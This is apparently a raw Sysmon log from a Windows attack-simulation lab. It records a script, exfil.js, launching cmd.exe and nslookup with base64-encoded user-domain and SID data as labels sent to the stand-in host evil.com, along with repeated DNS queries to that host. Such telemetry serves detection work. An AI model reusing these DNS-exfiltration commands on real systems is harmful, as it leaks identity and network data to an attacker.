14:21:31.896{2E1864BB-18EB-629A-A943-000000005F02}50125384C:\Windows\system32\conhost.exe{2E1864BB-18EB-629A-A843-000000005F02}7508C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209007Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.896{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-A943-000000005F02}5012C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209006Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.881{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209005Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.881{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209004Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.881{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209003Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.881{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209002Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.881{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-A843-000000005F02}7508C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209001Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.881{2E1864BB-18E0-629A-6742-000000005F02}39767440C:\Windows\System32\WScript.exe{2E1864BB-18EB-629A-A843-000000005F02}7508C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209000Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.890{2E1864BB-18EB-629A-A843-000000005F02}7508C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsacxvct.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208999Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.881{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmtk.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000208998Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.880{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55DAB332A87A51DEBE777ADF1A4C133C,SHA256=9C5EEB9C34457C671294893E3D9A4BACE15CD2E3B323629DBCDBADE1F5A265E2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208997Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.859{2E1864BB-18EB-629A-A643-000000005F02}37646192C:\Windows\system32\conhost.exe{2E1864BB-18EB-629A-A743-000000005F02}6676C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208996Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.859{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208995Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.859{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208994Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.859{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208993Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.859{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208992Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.859{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-A743-000000005F02}6676C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208991Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.859{2E1864BB-18EB-629A-A543-000000005F02}62083792C:\Windows\system32\cmd.exe{2E1864BB-18EB-629A-A743-000000005F02}6676C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208990Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.867{2E1864BB-18EB-629A-A743-000000005F02}6676C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EB-629A-A543-000000005F02}6208C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmtk.tmp 2>&1 22542200x8000000000000000208989Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.741{00000000-0000-0000-0000-000000000000}6512evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208988Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.664{00000000-0000-0000-0000-000000000000}1188evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208987Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.585{00000000-0000-0000-0000-000000000000}2628evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208986Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.502{00000000-0000-0000-0000-000000000000}1352evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208985Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.409{00000000-0000-0000-0000-000000000000}3712evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208984Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.306{00000000-0000-0000-0000-000000000000}6324evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208983Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.213{00000000-0000-0000-0000-000000000000}884evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208982Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.109{00000000-0000-0000-0000-000000000000}4932evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208981Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.000{00000000-0000-0000-0000-000000000000}2076evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208980Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.912{00000000-0000-0000-0000-000000000000}2384evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208979Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.827{00000000-0000-0000-0000-000000000000}1372evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000208978Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.843{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EB-629A-A643-000000005F02}3764C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208977Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.843{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EB-629A-A643-000000005F02}3764C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208976Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.843{2E1864BB-18EB-629A-A643-000000005F02}37646192C:\Windows\system32\conhost.exe{2E1864BB-18EB-629A-A543-000000005F02}6208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208975Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.828{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-A643-000000005F02}3764C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208974Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.828{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208973Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.828{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208972Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.828{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208971Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.828{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208970Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.828{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-A543-000000005F02}6208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208969Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.828{2E1864BB-18E0-629A-6742-000000005F02}39768072C:\Windows\System32\WScript.exe{2E1864BB-18EB-629A-A543-000000005F02}6208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208968Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.833{2E1864BB-18EB-629A-A543-000000005F02}6208C:\Windows\System32\cmd.exe10.0.14393.0 